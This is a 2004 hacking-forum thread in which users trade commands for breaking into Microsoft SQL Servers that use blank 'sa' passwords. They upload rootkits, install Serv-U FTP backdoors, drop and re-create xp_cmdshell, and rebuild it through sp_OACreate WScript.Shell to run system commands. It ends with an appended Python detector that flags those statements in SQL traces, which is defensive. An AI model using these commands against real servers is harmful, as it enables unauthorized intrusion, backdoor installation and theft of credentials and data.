Hi, I was reading the tut and all... I wanted to know where I can get osql.exe or a program like that. This is my problem: I got a successful login for MSSQL and I upload my rootkit, then sqlexec freezes. Is there any way that I can prevent this? Or any way of starting my file on that computer? Thanks
u sure that all the files were uploaded? if yes, so i use serv-u, just type this
servudaemon.exe /h
servudaemon.exe /i
servudaemon.exe /s
net start serv-u
and connect to the ip with the port in ur servudaemon.ini
bevan_16
Apr 6 2004, 11:51 AM
i usually type this, with the folders in front of course....but what's the /s do?
ServUDaemon.exe /h /i
oh, and you can control your ftp from serv-u admin, so you can see who connects to it and that sorta crap
sizza
Apr 6 2004, 03:14 PM
no, not serv u. i upload my rootkit with pkunzip and extract, or i upload my .exe and then it freezes, but dunno if it works. and what does
CODE
/h /i /s
do? thanks for the help
sizza
Apr 7 2004, 01:09 PM
btw is there another way i can upload to a sql w/o ftp or tftp??
Killaloop
Apr 7 2004, 01:18 PM
QUOTE (sizza @ Apr 7 2004, 01:09 PM)
btw is there another way i can upload to a sql w/o ftp or tftp??
read the post about New Way To Download , Execute Binary From Cmd
Falcor
Apr 10 2004, 05:59 PM
QUOTE (Killaloop @ Mar 24 2004, 01:05 PM)
there is nothing wrong when sql_no_data is displayed. this is no error, this is the reply from the sql server to your command. why? because you are echoing into a file so there is no reply with data to your command. only a 0 for successful which will be interpreted as no_data
just write "type youscript.txt" and you will see everything worked the way it should
awesome man, didn't realize that, it's really helping out a lot now
Dalrok
Apr 10 2004, 06:51 PM
nice tut, great work. i'm gonna give it a try and ask questions if i'm stuck
popo0421
Apr 12 2004, 12:30 AM
usually, i will try.... exec sp_dropextendedproc , "xp_cmdshell", then do sp_addextendedproc to add a new xp_cmdshell.
anyway, this is a nice post. thk.
ma4
Apr 15 2004, 02:10 AM
i tested the script and it works... why is it so easy ;) i think you can't secure it completely, there is always a way to break through :(
braini
Apr 16 2004, 01:06 PM
nice tut gonna check it out thnx
realloader
Apr 16 2004, 02:00 PM
Can someone help me? I did all tut in here, but it doesn't work. Here u can see:
1-Sqlexec.exe with Apple icon say: SQL_ERROR
---------------------------------------------
2-osql
C:\sql>osql.exe -S xxxx.xxx.xxx.xxx -U sa -P "" -i restore.txt
1> 2> 3> Msg 2714, Level 16, State 7, Server CROWN, Procedure sp_addextendedproc , Line 26
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database.
1>
------------------------------------------------
3-SqlBrower
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
Can't see what the hashes are and the usernames. Anyone got a suggestion? Maybe using something else than Osql?
The Storm
Apr 20 2004, 10:37 AM
QUOTE (realloader @ Apr 16 2004, 02:00 PM)
Can someone help me? I did all tut in here, but it doesn't work. Here u can see:
1-Sqlexec.exe with Apple icon say: SQL_ERROR
---------------------------------------------
2-osql
C:\sql>osql.exe -S xxxx.xxx.xxx.xxx -U sa -P "" -i restore.txt
1> 2> 3> Msg 2714, Level 16, State 7, Server CROWN, Procedure sp_addextendedproc , Line 26
[Microsoft][ODBC SQL Server Driver][SQL Server]There is already an object named 'xp_cmdshell' in the database.
1>
------------------------------------------------
3-SqlBrower
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
It come like this: Line 20:Incorrect syntax near '@ShellID' --------------------------------------------------------------- Help me pl.!
u have to drop the old xp_cmdshell!!!! There is still one old that must be dropped. i think the command is
sp_dropprocedur or sp_dropextendedprocedur or sth. like this, I'm not really sure!
@TheOther I don't know this way, try out the other ways explained in here!
realloader
Apr 20 2004, 12:11 PM
QUOTE (The Storm @ Apr 20 2004, 10:37 AM)
sp_dropprocedur or sp_dropextendedprocedur or sth. like this I`m not really sure!
how to sp_dropprocedur it? with sqlexec, osql or sqlbrowser?
The Storm
Apr 20 2004, 01:54 PM
QUOTE (realloader @ Apr 20 2004, 12:11 PM)
QUOTE (The Storm @ Apr 20 2004, 10:37 AM)
sp_dropprocedur or sp_dropextendedprocedur or sth. like this I`m not really sure!
how to sp_dropprocedur it? with sqlexec, osql or sqlbrowser?
ok i always use SQLBROWSER, there u only have to type
DROP xp_cmdshell
then it's removed
on osql.exe u have to use a txt file on ur pc
////////////////////////////////////////////////////////////////////////////////////////////////////// use master / exec sp_dropextendedproc 'xp_cmdshell' go / //////////////////////////////////////////////////////////////////////////////////////////////////////
hope it works, if not try dropextendedproc or procedure or just use the SQLbrowser way, it's the simplest and really works
in SQLEXEC it doesn't work cause SQLEXEC uses the xpcmdshell and there is no way of self destruction *g* if i'm at home i'm gonna search for the sp_******* command!
realloader
Apr 20 2004, 04:47 PM
Thank u for reply! however it doesn't work. I open sqlbrowser, give the command: DROP xp_cmdshell and click on connect. Error pops up: Line 1:Incorrect syntax near 'xp_cmdshell'. Other idea?
willywutz
Apr 20 2004, 05:31 PM
in SQLEXEC ( green apple ) this command exec sp_dropextendedproc 'xp_cmdshell' with format %s works fine for me.
Another way Enterprise Manager query analyzer, there you can choose the DB and use the command. This should work in all cases.
but i have no idea which *.exe we could use 4 executing commands
Eps__Em
Oct 10 2004, 12:50 PM
Thanks for this nice tut. I tried it and it worked. I've got two questions: When I restored the xp_cmdshell, I don't get a Sql Error, but there's no output in SQLExec. Has every SQL Server with a restored xp_cmdshell to be hacked blind?
And the other question is: How can I hack a sql server that's behind a router. The normal way doesn't work. Almost all SQL Servers I find are behind a router . But I know that it's possible.
Thanks for Help!
cya Eps__Em
bipo
Oct 26 2004, 02:01 PM
QUOTE(Eps__Em @ Oct 10 2004, 07:50 AM)
When I restored the xp_cmdshell, I don't get a Sql Error, but theres no output in SQLExec. Has every SQL Server with a restored xp_cmdshell to be hacked blind?
same here.....
thx 4 help!
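Seen from the defending side, the statements traded in this thread (sp_dropextendedproc and sp_addextendedproc against xp_cmdshell, a user-written procedure created under that name, sp_OACreate of WScript.Shell) leave a recognisable trail in a SQL Server statement trace. The following is an added example, not part of the original thread: a small detector run over constructed trace lines, where the "timestamp|client|login|statement" format, the addresses, the rule names and the function names are all assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample trace, one statement per line:
# "timestamp|client|login|statement" (format and values are assumptions).
SAMPLE_TRACE = """\
2004-04-20 13:54:02|203.0.113.7|sa|exec sp_dropextendedproc 'xp_cmdshell'
2004-04-20 13:54:40|203.0.113.7|sa|EXEC sp_addextendedproc 'xp_cmdshell', '<dll>'
2004-04-20 14:01:00|10.0.0.5|app_rw|SELECT name FROM customers WHERE id = 7
2004-04-20 14:03:00|198.51.100.9|sa|CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS EXECUTE sp_OACreate 'WScript.Shell', @s OUT
"""

# Rule names are hypothetical; the procedure names come from the thread.
RULES = [
    ("xp_drop",   re.compile(r"\bsp_dropextendedproc\b.*xp_cmdshell", re.I)),
    ("xp_add",    re.compile(r"\bsp_addextendedproc\b.*xp_cmdshell", re.I)),
    ("xp_shadow", re.compile(r"\bcreate\s+proc(edure)?\s+(\w*\.)*xp_cmdshell\b", re.I)),
    ("ole_shell", re.compile(r"\bsp_OACreate\b.*WScript\.Shell", re.I)),
]

def parse(line):
    ts, client, login, stmt = line.split("|", 3)
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), client, login, stmt

def detect(trace, window=timedelta(minutes=10)):
    """Return (alerts, correlated): per-statement rule hits, plus clients that
    removed xp_cmdshell and then re-created it within `window`."""
    alerts, last_drop, correlated = [], {}, set()
    for line in filter(None, map(str.strip, trace.splitlines())):
        ts, client, login, stmt = parse(line)
        for name, rx in RULES:
            if not rx.search(stmt):
                continue
            alerts.append((ts, client, login, name))
            if name == "xp_drop":
                last_drop[client] = ts
            elif name in ("xp_add", "xp_shadow"):
                dropped = last_drop.get(client)
                if dropped and ts - dropped <= window:
                    correlated.add(client)
    return alerts, sorted(correlated)

if __name__ == "__main__":
    alerts, correlated = detect(SAMPLE_TRACE)
    for ts, client, login, name in alerts:
        print(ts, client, login, name)
    print("drop-then-recreate from:", correlated)
```

A drop followed by a re-create from the same client is the strongest signal here, since neither statement belongs in normal application traffic.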